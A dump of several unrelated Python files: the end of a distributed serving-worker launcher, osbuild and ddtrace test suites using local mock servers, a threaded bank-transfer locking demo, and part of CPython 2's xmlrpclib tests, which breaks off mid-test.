unix_socket_dir = "unix_socket_files"
try:
os.mkdir(unix_socket_dir)
except FileExistsError:
pass
worker_address = f"unix:{unix_socket_dir}/serving_worker_{servable_name}_distributed_{worker_pid}"
try:
distributed.start_servable(servable_directory=servable_directory, servable_name=servable_name,
version_number=version_number, rank_table_json_file=rank_table_json_file,
distributed_address=distributed_address,
wait_agents_time_in_seconds=wait_agents_time_in_seconds,
master_address=master_address, worker_address=worker_address)
except RuntimeError as ex:
Worker_.notify_failed(master_address, f"{{distributed servable:{servable_name}, {ex}}}")
raise
def parse_args_and_start():
"""Parse args and start distributed worker"""
if len(sys.argv) != 9:
raise RuntimeError("Expect length of input argv to be 8: str{servable_directory} str{servable_name} "
"int{version_number} str{rank_table_json_file} str{distributed_address} "
"int{wait_agents_time_in_seconds} str{master_address} bool{listening_master}")
servable_directory = sys.argv[1]
servable_name = sys.argv[2]
version_number = int(sys.argv[3])
rank_table_json_file = sys.argv[4]
distributed_address = sys.argv[5]
wait_agents_time_in_seconds = int(sys.argv[6])
master_address = sys.argv[7]
# pylint: disable=simplifiable-if-expression
listening_master = True if sys.argv[8].lower() == "true" else False
start_worker(servable_directory, servable_name, version_number, rank_table_json_file, distributed_address,
wait_agents_time_in_seconds, master_address, listening_master)
if __name__ == '__main__':
parse_args_and_start()
|
test_sources.py
|
#
# Runtime Tests for Source Modules
#
import contextlib
import ctypes
import http.server
import json
import os
import socketserver
import subprocess
import tempfile
import threading
import pytest
import osbuild.objectstore
import osbuild.meta
import osbuild.sources
from osbuild import host
from .. import test
def errcheck(ret, _func, _args):
if ret == -1:
e = ctypes.get_errno()
raise OSError(e, os.strerror(e))
CLONE_NEWNET = 0x40000000
libc = ctypes.CDLL('libc.so.6', use_errno=True)
libc.setns.errcheck = errcheck
@contextlib.contextmanager
def netns():
# Grab a reference to the current namespace.
with open("/proc/self/ns/net") as oldnet:
# Create a new namespace and enter it.
libc.unshare(CLONE_NEWNET)
try:
# Up the loopback device in the new namespace.
subprocess.run(["ip", "link", "set", "up", "dev", "lo"], check=True)
yield
finally:
# Revert to the old namespace, dropping our
# reference to the new one.
libc.setns(oldnet.fileno(), CLONE_NEWNET)
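# Everything executed inside "with netns():" sees only the fresh namespace's
# loopback interface, so the HTTP server bound to port 80 below never touches
# the host network. A minimal usage sketch (the URL is illustrative):
#
#     with netns():
#         subprocess.run(["curl", "http://127.0.0.1:80/some/file"], check=False)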
@contextlib.contextmanager
def fileServer(directory):
with netns():
# This is leaked until the program exits, but inaccessible after the with
# due to the network namespace.
barrier = threading.Barrier(2)
thread = threading.Thread(target=runFileServer, args=(barrier, directory))
thread.daemon = True
thread.start()
barrier.wait()
yield
def can_setup_netns() -> bool:
try:
with netns():
return True
except: # pylint: disable=bare-except
return False
def runFileServer(barrier, directory):
class Handler(http.server.SimpleHTTPRequestHandler):
def __init__(self, request, client_address, server):
super().__init__(request, client_address, server, directory=directory)
httpd = socketserver.TCPServer(('', 80), Handler)
barrier.wait()
httpd.serve_forever()
def make_test_cases():
sources = os.path.join(test.TestBase.locate_test_data(), "sources")
if os.path.exists(sources):
for source in os.listdir(sources):
for case in os.listdir(f"{sources}/{source}/cases"):
yield source, case
def check_case(source, case, store, libdir):
with host.ServiceManager() as mgr:
expects = case["expects"]
if expects == "error":
with pytest.raises(host.RemoteError):
source.download(mgr, store, libdir)
elif expects == "success":
source.download(mgr, store, libdir)
else:
raise ValueError(f"invalid expectation: {expects}")
@pytest.fixture(name="tmpdir")
def tmpdir_fixture():
with tempfile.TemporaryDirectory() as tmp:
yield tmp
@pytest.mark.skipif(not can_setup_netns(), reason="network namespace setup failed")
@pytest.mark.parametrize("source,case", make_test_cases())
def test_sources(source, case, tmpdir):
index = osbuild.meta.Index(os.curdir)
sources = os.path.join(test.TestBase.locate_test_data(), "sources")
with open(f"{sources}/{source}/cases/{case}") as f:
case_options = json.load(f)
info = index.get_module_info("Source", source)
desc = case_options[source]
items = desc.get("items", {})
options = desc.get("options", {})
src = osbuild.sources.Source(info, items, options)
with osbuild.objectstore.ObjectStore(tmpdir) as store, \
fileServer(test.TestBase.locate_test_data()):
check_case(src, case_options, store, index.path)
check_case(src, case_options, store, index.path)
|
test_api.py
|
import mock
import re
import socket
import threading
import time
import warnings
from unittest import TestCase
import pytest
from ddtrace.api import API, Response
from ddtrace.compat import iteritems, httplib, PY3
from ddtrace.internal.runtime.container import CGroupInfo
from ddtrace.vendor.six.moves import BaseHTTPServer, socketserver
class _BaseHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
error_message_format = '%(message)s\n'
error_content_type = 'text/plain'
@staticmethod
def log_message(format, *args): # noqa: A002
pass
class _APIEndpointRequestHandlerTest(_BaseHTTPRequestHandler):
def do_PUT(self):
self.send_error(200, 'OK')
class _TimeoutAPIEndpointRequestHandlerTest(_BaseHTTPRequestHandler):
def do_PUT(self):
# This server sleeps longer than our timeout
time.sleep(5)
class _ResetAPIEndpointRequestHandlerTest(_BaseHTTPRequestHandler):
def do_PUT(self):
return
_HOST = '0.0.0.0'
_TIMEOUT_PORT = 8743
_RESET_PORT = _TIMEOUT_PORT + 1
class UDSHTTPServer(socketserver.UnixStreamServer, BaseHTTPServer.HTTPServer):
def server_bind(self):
BaseHTTPServer.HTTPServer.server_bind(self)
def _make_uds_server(path, request_handler):
server = UDSHTTPServer(path, request_handler)
t = threading.Thread(target=server.serve_forever)
# Set daemon just in case something fails
t.daemon = True
t.start()
return server, t
@pytest.fixture
def endpoint_uds_server(tmp_path):
server, thread = _make_uds_server(str(tmp_path / 'uds_server_socket'), _APIEndpointRequestHandlerTest)
try:
yield server
finally:
server.shutdown()
thread.join()
def _make_server(port, request_handler):
server = BaseHTTPServer.HTTPServer((_HOST, port), request_handler)
t = threading.Thread(target=server.serve_forever)
# Set daemon just in case something fails
t.daemon = True
t.start()
return server, t
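# The fixtures below all follow the same pattern: start the handler's server in
# a daemon thread, yield to the test, then always shut the server down and join
# the thread so the port (or socket path) is released even when a test fails.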
@pytest.fixture(scope='module')
def endpoint_test_timeout_server():
server, thread = _make_server(_TIMEOUT_PORT, _TimeoutAPIEndpointRequestHandlerTest)
try:
yield thread
finally:
server.shutdown()
thread.join()
@pytest.fixture(scope='module')
def endpoint_test_reset_server():
server, thread = _make_server(_RESET_PORT, _ResetAPIEndpointRequestHandlerTest)
try:
yield thread
finally:
server.shutdown()
thread.join()
class ResponseMock:
def __init__(self, content, status=200):
self.status = status
self.content = content
def read(self):
return self.content
def test_api_str():
api = API('localhost', 8126)
assert str(api) == 'localhost:8126'
api = API('localhost', 8126, '/path/to/uds')
assert str(api) == '/path/to/uds'
class APITests(TestCase):
def setUp(self):
# DEV: Mock here instead of in tests, before we have patched `httplib.HTTPConnection`
self.conn = mock.MagicMock(spec=httplib.HTTPConnection)
self.api = API('localhost', 8126)
def tearDown(self):
del self.api
del self.conn
def test_typecast_port(self):
api = API('localhost', u'8126')
self.assertEqual(api.port, 8126)
@mock.patch('logging.Logger.debug')
def test_parse_response_json(self, log):
test_cases = {
'OK': dict(
js=None,
log='Cannot parse Datadog Agent response, please make sure your Datadog Agent is up to date',
),
'OK\n': dict(
js=None,
log='Cannot parse Datadog Agent response, please make sure your Datadog Agent is up to date',
),
'error:unsupported-endpoint': dict(
js=None,
log='Unable to parse Datadog Agent JSON response: .*? \'error:unsupported-endpoint\'',
),
42: dict( # int as key to trigger TypeError
js=None,
log='Unable to parse Datadog Agent JSON response: .*? 42',
),
'{}': dict(js={}),
'[]': dict(js=[]),
# Priority sampling "rate_by_service" response
('{"rate_by_service": '
'{"service:,env:":0.5, "service:mcnulty,env:test":0.9, "service:postgres,env:test":0.6}}'): dict(
js=dict(
rate_by_service={
'service:,env:': 0.5,
'service:mcnulty,env:test': 0.9,
'service:postgres,env:test': 0.6,
},
),
),
' [4,2,1] ': dict(js=[4, 2, 1]),
}
for k, v in iteritems(test_cases):
log.reset_mock()
r = Response.from_http_response(ResponseMock(k))
js = r.get_json()
assert v['js'] == js
if 'log' in v:
log.assert_called_once()
msg = log.call_args[0][0] % log.call_args[0][1:]
assert re.match(v['log'], msg), msg
@mock.patch('ddtrace.compat.httplib.HTTPConnection')
def test_put_connection_close(self, HTTPConnection):
"""
When calling API._put
we close the HTTPConnection we create
"""
HTTPConnection.return_value = self.conn
with warnings.catch_warnings(record=True) as w:
self.api._put('/test', '<test data>', 1)
self.assertEqual(len(w), 0, 'Test raised unexpected warnings: {0!r}'.format(w))
self.conn.request.assert_called_once()
self.conn.close.assert_called_once()
@mock.patch('ddtrace.compat.httplib.HTTPConnection')
def test_put_connection_close_exception(self, HTTPConnection):
"""
When calling API._put raises an exception
we close the HTTPConnection we create
"""
HTTPConnection.return_value = self.conn
# Ensure calling `request` raises an exception
self.conn.request.side_effect = Exception
with warnings.catch_warnings(record=True) as w:
with self.assertRaises(Exception):
self.api._put('/test', '<test data>', 1)
self.assertEqual(len(w), 0, 'Test raised unexpected warnings: {0!r}'.format(w))
self.conn.request.assert_called_once()
self.conn.close.assert_called_once()
def test_flush_connection_timeout_connect():
payload = mock.Mock()
payload.get_payload.return_value = 'foobar'
payload.length = 12
api = API(_HOST, 2019)
response = api._flush(payload)
if PY3:
assert isinstance(response, (OSError, ConnectionRefusedError)) # noqa: F821
else:
assert isinstance(response, socket.error)
assert response.errno in (99, 111)
def test_flush_connection_timeout(endpoint_test_timeout_server):
payload = mock.Mock()
payload.get_payload.return_value = 'foobar'
payload.length = 12
api = API(_HOST, _TIMEOUT_PORT)
response = api._flush(payload)
assert isinstance(response, socket.timeout)
def test_flush_connection_reset(endpoint_test_reset_server):
payload = mock.Mock()
payload.get_payload.return_value = 'foobar'
payload.length = 12
api = API(_HOST, _RESET_PORT)
response = api._flush(payload)
if PY3:
assert isinstance(response, (httplib.BadStatusLine, ConnectionResetError)) # noqa: F821
else:
assert isinstance(response, httplib.BadStatusLine)
def test_flush_connection_uds(endpoint_uds_server):
payload = mock.Mock()
payload.get_payload.return_value = 'foobar'
payload.length = 12
api = API(_HOST, 2019, uds_path=endpoint_uds_server.server_address)
response = api._flush(payload)
assert response.status == 200
@mock.patch('ddtrace.internal.runtime.container.get_container_info')
def test_api_container_info(get_container_info):
# When we have container information
# DEV: `get_container_info` will return a `CGroupInfo` with a `container_id` or `None`
info = CGroupInfo(container_id='test-container-id')
get_container_info.return_value = info
api = API(_HOST, 8126)
assert api._container_info is info
assert api._headers['Datadog-Container-Id'] == 'test-container-id'
# When we do not have container information
get_container_info.return_value = None
api = API(_HOST, 8126)
assert api._container_info is None
assert 'Datadog-Container-Id' not in api._headers
|
mine_safe_bank.py
|
import datetime
import random
import time
from threading import Thread, RLock
from typing import List
class Account:
def __init__(self, balance=0):
self.balance = balance
def main():
accounts = create_accounts()
total = sum(a.balance for a in accounts)
validate_bank(accounts, total)
print("Starting transfers...")
jobs = [
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
]
t0 = datetime.datetime.now()
[j.start() for j in jobs]
[j.join() for j in jobs]
dt = datetime.datetime.now() - t0
print("Transfers complete ({:,.2f}) sec".format(dt.total_seconds()))
validate_bank(accounts, total)
def do_bank_stuff(accounts, total):
for _ in range(1, 10000):
a1, a2 = get_two_accounts(accounts)
amount = random.randint(1, 100)
do_transfer(a1, a2, amount)
validate_bank(accounts, total, quiet=True)
def create_accounts() -> List[Account]:
return [
Account(balance=5000),
Account(balance=10000),
Account(balance=7500),
Account(balance=7000),
Account(balance=6000),
Account(balance=9000),
]
accounts_balance_lock = RLock()
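# A single module-level lock guards every balance mutation and the consistency
# check, so a transfer's debit and credit are observed atomically by
# validate_bank(). An RLock is used here, although a plain threading.Lock would
# also work in this demo since the lock is never acquired re-entrantly.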
def do_transfer(from_account: Account, to_account: Account, amount: int):
if from_account.balance < amount:
return
with accounts_balance_lock:
from_account.balance -= amount
time.sleep(0.000)
to_account.balance += amount
def validate_bank(accounts: List[Account], total: int, quiet=False):
with accounts_balance_lock:
current = sum(a.balance for a in accounts)
if current != total:
print(
"ERROR: Inconsistent account balance: ${:,} vs ${:,}".format(
current, total
),
flush=True,
)
elif not quiet:
print(
"All good: Consistent account balance: ${:,}".format(total),
flush=True,
)
def get_two_accounts(accounts):
a1 = random.choice(accounts)
a2 = a1
while a2 == a1:
a2 = random.choice(accounts)
return a1, a2
if __name__ == "__main__":
main()
|
test_xmlrpc.py
|
import base64
import datetime
import sys
import time
import unittest
import xmlrpclib
import SimpleXMLRPCServer
import mimetools
import httplib
import socket
import StringIO
import os
import re
from test import test_support
try:
import threading
except ImportError:
threading = None
try:
import gzip
except ImportError:
gzip = None
alist = [{'astring': 'foo@bar.baz.spam',
'afloat': 7283.43,
'anint': 2**20,
'ashortlong': 2L,
'anotherlist': ['.zyx.41'],
'abase64': xmlrpclib.Binary("my dog has fleas"),
'boolean': xmlrpclib.False,
'datetime1': xmlrpclib.DateTime('20050210T11:41:23'),
'datetime2': xmlrpclib.DateTime(
(2005, 02, 10, 11, 41, 23, 0, 1, -1)),
'datetime3': xmlrpclib.DateTime(
datetime.datetime(2005, 02, 10, 11, 41, 23)),
}]
if test_support.have_unicode:
alist[0].update({
'unicode': test_support.u(r'\u4000\u6000\u8000'),
test_support.u(r'ukey\u4000'): 'regular value',
})
class XMLRPCTestCase(unittest.TestCase):
def test_dump_load(self):
self.assertEqual(alist,
xmlrpclib.loads(xmlrpclib.dumps((alist,)))[0][0])
def test_dump_bare_datetime(self):
# This checks that an unwrapped datetime.date object can be handled
# by the marshalling code. This can't be done via test_dump_load()
# since with use_datetime set to 1 the unmarshaller would create
# datetime objects for the 'datetime[123]' keys as well
dt = datetime.datetime(2005, 02, 10, 11, 41, 23)
s = xmlrpclib.dumps((dt,))
(newdt,), m = xmlrpclib.loads(s, use_datetime=1)
self.assertEqual(newdt, dt)
self.assertEqual(m, None)
(newdt,), m = xmlrpclib.loads(s, use_datetime=0)
self.assertEqual(newdt, xmlrpclib.DateTime('20050210T11:41:23'))
def test_datetime_before_1900(self):
# same as before but with a date before 1900
dt = datetime.datetime(1, 02, 10, 11, 41, 23)
s = xmlrpclib.dumps((dt,))
(newdt,), m = xmlrpclib.loads(s, use_datetime=1)
self.assertEqual(newdt, dt)
self.assertEqual(m, None)
(newdt,), m = xmlrpclib.loads(s, use_datetime=0)
self.assertEqual(newdt, xmlrpclib.DateTime('00010210T11:41:23'))
def test_cmp_datetime_DateTime(self):
now = datetime.datetime.now()
dt = xmlrpclib.DateTime(now.timetuple())
self.assertTrue(dt == now)
self.assertTrue(now == dt)
then = now + datetime.timedelta(seconds=4)
self.assertTrue(then >= dt)
self.assertTrue(dt < then)
def test_bug_1164912 (self):
d = xmlrpclib.DateTime()
((new_d,), dummy) = xmlrpclib.loads(xmlrpclib.dumps((d,),
methodresponse=True))
self.assertIsInstance(new_d.value, str)
# Check that the output of dumps() is still an 8-bit string
s = xmlrpclib.dumps((new_d,), methodresponse=True)
self.assertIsInstance(s, str)
def test_newstyle_class(self):
class T(object):
pass
t = T()
t.x = 100
t.y = "Hello"
((t2,), dummy) = xmlrpclib.loads(xmlrpclib.dumps((t,)))
self.assertEqual(t2, t.__dict__)
def test_dump_big_long(self):
self.assertRaises(OverflowError, xmlrpclib.dumps, (2L**99,))
def test_dump_bad_dict(self):
self.assertRaises(TypeError, xmlrpclib.dumps, ({(1,2,3): 1},))
def test_dump_recursive_seq(self):
l = [1,2,3]
t = [3,4,5,l]
l.append(t)
self.assertRaises(TypeError, xmlrpclib.dumps, (l,))
def test_dump_recursive_dict(self):
d = {'1':1, '2':1}
t = {'3':3, 'd':d}
d['t'] = t
self.assertRaises(TypeError, xmlrpclib.dumps, (d,))
def test_dump_big_int(self):
if sys.maxint > 2L**31-1:
self.assertRaises(OverflowError, xmlrpclib.dumps,
(int(2L**34),))
xmlrpclib.dumps((xmlrpclib.MAXINT, xmlrpclib.MININT))
self.assertRaises(OverflowError, xmlrpclib.dumps, (xmlrpclib.MAXINT+1,))
self.assertRaises(OverflowError, xmlrpclib.dumps, (xmlrpclib.MININT-1,))
def dummy_write(s):
pass
m = xmlrpclib.Marshaller()
m.dump_int(xmlrpclib.MAXINT, dummy_write)
m.dump_int(xmlrpclib.MININT, dummy_write)
self.assertRaises(OverflowError, m.dump_int, xmlrpclib.MAXINT+1, dummy_write)
self.assertRaises(OverflowError, m.dump_int, xmlrpclib.MININT-1, dummy_write)
def test_dump_none(self):
value = alist + [None]
arg1 = (alist + [None],)
strg = xmlrpclib.dumps(arg1, allow_none=True)
self.assertEqual(value,
xmlrpclib.loads(strg)[0][0])
self.assertRaises(TypeError, xmlrpclib.dumps, (arg1,))
@test_support.requires_unicode
def test_dump_encoding(self):
value = {test_support.u(r'key\u20ac\xa4'):
test_support.u(r'value\u20ac\xa4')}
strg = xmlrpclib.dumps((value,), encoding='iso-8859-15')
strg = "<?xml version='1.0' encoding='iso-8859-15'?>" + strg
self.assertEqual(xmlrpclib.loads(strg)[0][0], value)
strg = xmlrpclib.dumps((value,), encoding='iso-8859-15',
methodresponse=True)
self.assertEqual(xmlrpclib.loads(strg)[0][0], value)
methodname = test_support.u(r'method\u20ac\xa4')
strg = xmlrpclib.dumps((value,), encoding='iso-8859-15',
methodname=methodname)
self.assertEqual(xmlrpclib.loads(strg)[0][0], value)
self.assertEqual(xmlrpclib.loads(strg)[1], methodname)
@test_support.requires_unicode
def test_default_encoding_issues(self):
# SF bug #1115989: wrong decoding in '_stringify'
utf8 = """<?xml version='1.0' encoding='iso-8859-1'?>
<params>
<param><value>
<string>abc \x95</string>
</value></param>
<param><value>
<struct>
<member>
<name>def \x96</name>
<value><string>ghi \x97</string></value>
</member>
</struct>
</value></param>
</params>
"""
# sys.setdefaultencoding() normally doesn't exist after site.py is
# loaded. Import a temporary fresh copy to get access to it
# but then restore the original copy to avoid messing with
# other potentially modified sys module attributes
old_encoding = sys.getdefaultencoding()
with test_support.CleanImport('sys'):
import sys as temp_sys
temp_sys.setdefaultencoding("iso-8859-1")
try:
(s, d), m = xmlrpclib.loads(utf8)
finally:
temp_sys.setdefaultencoding(old_encoding)
items = d.items()
if test_support.have_unicode:
self.assertEqual(s, u"abc \x95")
self.assertIsInstance(s, unicode)
self.assertEqual(items, [(u"def \x96", u"ghi \x97")])
self.assertIsInstance(items[0][0], unicode)
self.assertIsInstance(items[0][1], unicode)
else:
self.assertEqual(s, "abc \xc2\x95")
self.assertEqual(items, [("def \xc2\x96", "ghi \xc2\x97")])
def test_loads_unsupported(self):
ResponseError = xmlrpclib.ResponseError
data = '<params><param><value><spam/></value></param></params>'
self.assertRaises(ResponseError, xmlrpclib.loads, data)
data = ('<params><param><value><array>'
'<value><spam/></value>'
'</array></value></param></params>')
self.assertRaises(ResponseError, xmlrpclib.loads, data)
data = ('<params><param><value><struct>'
'<member><name>a</name><value><spam/></value></member>'
'<member><name>b</name><value><spam/></value></member>'
'</struct></value></param></params>')
self.assertRaises(ResponseError, xmlrpclib.loads, data)
class HelperTestCase(unittest.TestCase):
def test_escape(self):
self.assertEqual(xmlrpclib.escape("a&b"), "a&b")
self.assertEqual(xmlrpclib.escape("a<b"), "a<b")
self.assertEqual(xmlrpclib.escape("a>b"), "a>b")
class FaultTestCase(unittest.TestCase):
def test_repr(self):
f = xmlrpclib.Fault(42, 'Test Fault')
self.assertEqual(repr(f), "<Fault 42: 'Test Fault'>")
self.assertEqual(repr(f), str(f))
def test_dump_fault(self):
f = xmlrpclib.Fault(42, 'Test Fault')
s = xmlrpclib.dumps((f,))
(newf,), m = xmlrpclib.loads(s)
self.assertEqual(newf, {'faultCode': 42, 'faultString': 'Test Fault'})
self.assertEqual(m, None)
s = xmlrpclib.Marshaller().dumps(f)
self.assertRaises(xmlrpclib.Fault, xmlrpclib.loads, s)
class DateTimeTestCase(unittest.TestCase):
def test_default(self):
t = xmlrpclib.DateTime()
def test_time(self):
d = 1181399930.036952
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), time.strftime("%Y%m%dT%H:%M:%S", time.localtime(d)))
def test_time_tuple(self):
d = (2007,6,9,10,38,50,5,160,0)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), '20070609T10:38:50')
def test_time_struct(self):
d = time.localtime(1181399930.036952)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), time.strftime("%Y%m%dT%H:%M:%S", d))
def test_datetime_datetime(self):
d = datetime.datetime(2007,1,2,3,4,5)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), '20070102T03:04:05')
def test_repr(self):
d = datetime.datetime(2007,1,2,3,4,5)
t = xmlrpclib.DateTime(d)
val ="<DateTime '20070102T03:04:05' at %x>" % id(t)
self.assertEqual(repr(t), val)
def test_decode(self):
d = ' 20070908T07:11:13 '
t1 = xmlrpclib.DateTime()
t1.decode(d)
tref = xmlrpclib.DateTime(datetime.datetime(2007,9,8,7,11,13))
self.assertEqual(t1, tref)
t2 = xmlrpclib._datetime(d)
self.assertEqual(t1, tref)
class BinaryTestCase(unittest.TestCase):
def test_default(self):
t = xmlrpclib.Binary()
self.assertEqual(str(t), '')
def test_string(self):
d = '\x01\x02\x03abc123\xff\xfe'
t = xmlrpclib.Binary(d)
self.assertEqual(str(t), d)
def test_decode(self):
d = '\x01\x02\x03abc123\xff\xfe'
de = base64.encodestring(d)
t1 = xmlrpclib.Binary()
t1.decode(de)
self.assertEqual(str(t1), d)
t2 = xmlrpclib._binary(de)
self.assertEqual(str(t2), d)
ADDR = PORT = URL = None
# The evt is set twice. First when the server is ready to serve.
# Second when the server has been shutdown. The user must clear
# the event after it has been set the first time to catch the second set.
def http_server(evt, numrequests, requestHandler=None, encoding=None):
class TestInstanceClass:
def div(self, x, y):
return x // y
def _methodHelp(self, name):
if name == 'div':
return 'This is the div function'
def my_function():
'''This is my function'''
return True
class MyXMLRPCServer(SimpleXMLRPCServer.SimpleXMLRPCServer):
def get_request(self):
# Ensure the socket is always non-blocking. On Linux, socket
# attributes are not inherited like they are on *BSD and Windows.
s, port = self.socket.accept()
s.setblocking(True)
return s, port
if not requestHandler:
requestHandler = SimpleXMLRPCServer.SimpleXMLRPCRequestHandler
serv = MyXMLRPCServer(("localhost", 0), requestHandler,
encoding=encoding,
logRequests=False, bind_and_activate=False)
try:
serv.socket.settimeout(3)
serv.server_bind()
global ADDR, PORT, URL
ADDR, PORT = serv.socket.getsockname()
#connect to IP address directly. This avoids socket.create_connection()
#trying to connect to "localhost" using all address families, which
#causes slowdown e.g. on vista which supports AF_INET6. The server listens
#on AF_INET only.
URL = "http://%s:%d"%(ADDR, PORT)
serv.server_activate()
serv.register_introspection_functions()
serv.register_multicall_functions()
serv.register_function(pow)
serv.register_function(lambda x,y: x+y, 'add')
serv.register_function(lambda x: x, test_support.u(r't\xea\u0161t'))
serv.register_function(my_function)
serv.register_instance(TestInstanceClass())
evt.set()
# handle up to 'numrequests' requests
while numrequests > 0:
serv.handle_request()
numrequests -= 1
except socket.timeout:
pass
finally:
serv.socket.close()
PORT = None
evt.set()
def http_multi_server(evt, numrequests, requestHandler=None):
class TestInstanceClass:
def div(self, x, y):
return x // y
def _methodHelp(self, name):
if name == 'div':
return 'This is the div function'
def my_function():
'''This is my function'''
return True
class MyXMLRPCServer(SimpleXMLRPCServer.MultiPathXMLRPCServer):
def get_request(self):
# Ensure the socket is always non-blocking. On Linux, socket
# attributes are not inherited like they are on *BSD and Windows.
s, port = self.socket.accept()
s.setblocking(True)
return s, port
if not requestHandler:
requestHandler = SimpleXMLRPCServer.SimpleXMLRPCRequestHandler
class MyRequestHandler(requestHandler):
rpc_paths = []
serv = MyXMLRPCServer(("localhost", 0), MyRequestHandler,
logRequests=False, bind_and_activate=False)
serv.socket.settimeout(3)
serv.server_bind()
try:
global ADDR, PORT, URL
ADDR, PORT = serv.socket.getsockname()
#connect to IP address directly. This avoids socket.create_connection()
#trying to connect to "localhost" using all address families, which
#causes slowdown e.g. on vista which supports AF_INET6. The server listens
#on AF_INET only.
URL = "http://%s:%d"%(ADDR, PORT)
serv.server_activate()
paths = ["/foo", "/foo/bar"]
for path in paths:
d = serv.add_dispatcher(path, SimpleXMLRPCServer.SimpleXMLRPCDispatcher())
d.register_introspection_functions()
d.register_multicall_functions()
serv.get_dispatcher(paths[0]).register_function(pow)
serv.get_dispatcher(paths[1]).register_function(lambda x,y: x+y, 'add')
evt.set()
# handle up to 'numrequests' requests
while numrequests > 0:
serv.handle_request()
numrequests -= 1
except socket.timeout:
pass
finally:
serv.socket.close()
PORT = None
evt.set()
# This function prevents errors like:
# <ProtocolError for localhost:57527/RPC2: 500 Internal Server Error>
def is_unavailable_exception(e):
'''Returns True if the given ProtocolError is the product of a server-side
exception caused by the 'temporarily unavailable' response sometimes
given by operations on non-blocking sockets.'''
# sometimes we get a -1 error code and/or empty headers
try:
if e.errcode == -1 or e.headers is None:
return True
exc_mess = e.headers.get('X-exception')
except AttributeError:
# Ignore socket.errors here.
exc_mess = str(e)
if exc_mess and 'temporarily unavailable' in exc_mess.lower():
return True
return False
@unittest.skipUnless(threading, 'Threading required for this test.')
class BaseServerTestCase(unittest.TestCase):
requestHandler = None
request_count = 1
threadFunc = staticmethod(http_server)
def setUp(self):
# enable traceback reporting
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = True
self.evt = threading.Event()
# start server thread to handle requests
serv_args = (self.evt, self.request_count, self.requestHandler)
threading.Thread(target=self.threadFunc, args=serv_args).start()
# wait for the server to be ready
self.evt.wait(10)
self.evt.clear()
def tearDown(self):
# wait on the server thread to terminate
test_support.gc_collect() # to close the active connections
self.evt.wait(10)
# disable traceback reporting
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = False
# NOTE: The tests in SimpleServerTestCase will ignore failures caused by
# "temporarily unavailable" exceptions raised in SimpleXMLRPCServer. This
# condition occurs infrequently on some platforms, frequently on others, and
# is apparently caused by using SimpleXMLRPCServer with a non-blocking socket
# If the server class is updated at some point in the future to handle this
# situation more gracefully, these tests should be modified appropriately.
class SimpleServerTestCase(BaseServerTestCase):
def test_simple1(self):
try:
p = xmlrpclib.ServerProxy(URL)
self.assertEqual(p.pow(6,8), 6**8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
@test_support.requires_unicode
def test_nonascii(self):
start_string = test_support.u(r'P\N{LATIN SMALL LETTER Y WITH CIRCUMFLEX}t')
end_string = test_support.u(r'h\N{LATIN SMALL LETTER O WITH HORN}n')
try:
p = xmlrpclib.ServerProxy(URL)
self.assertEqual(p.add(start_string, end_string),
start_string + end_string)
except (xmlrpclib.ProtocolError, socket.error) as e:
# ignore failures due to non-blocking socket unavailable errors.
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
@test_support.requires_unicode
def test_unicode_host(self):
server = xmlrpclib.ServerProxy(u"http://%s:%d/RPC2"%(ADDR, PORT))
self.assertEqual(server.add("a", u"\xe9"), u"a\xe9")
@test_support.requires_unicode
def test_client_encoding(self):
start_string = unichr(0x20ac)
end_string = unichr(0xa4)
try:
p = xmlrpclib.ServerProxy(URL, encoding='iso-8859-15')
self.assertEqual(p.add(start_string, end_string),
start_string + end_string)
except (xmlrpclib.ProtocolError, socket.error) as e:
# ignore failures due to non-blocking socket unavailable errors.
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
@test_support.requires_unicode
def test_nonascii_methodname(self):
try:
p = xmlrpclib.ServerProxy(URL, encoding='iso-8859-15')
m = getattr(p, 't\xea\xa8t')
self.assertEqual(m(42), 42)
except (xmlrpclib.ProtocolError, socket.error) as e:
# ignore failures due to non-blocking socket unavailable errors.
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
# [ch] The test 404 is causing lots of false alarms.
def XXXtest_404(self):
# send POST with httplib, it should return 404 header and
# 'Not Found' message.
conn = httplib.HTTPConnection(ADDR, PORT)
conn.request('POST', '/this-is-not-valid')
response = conn.getresponse()
conn.close()
self.assertEqual(response.status, 404)
self.assertEqual(response.reason, 'Not Found')
def test_introspection1(self):
try:
p = xmlrpclib.ServerProxy(URL)
meth = p.system.listMethods()
expected_methods = set(['pow', 'div', 'my_function', 'add',
test_support.u(r't\xea\u0161t'),
'system.listMethods', 'system.methodHelp',
'system.methodSignature', 'system.multicall'])
self.assertEqual(set(meth), expected_methods)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_introspection2(self):
try:
# test _methodHelp()
p = xmlrpclib.ServerProxy(URL)
divhelp = p.system.methodHelp('div')
self.assertEqual(divhelp, 'This is the div function')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_introspection3(self):
try:
# test native doc
p = xmlrpclib.ServerProxy(URL)
myfunction = p.system.methodHelp('my_function')
self.assertEqual(myfunction, 'This is my function')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
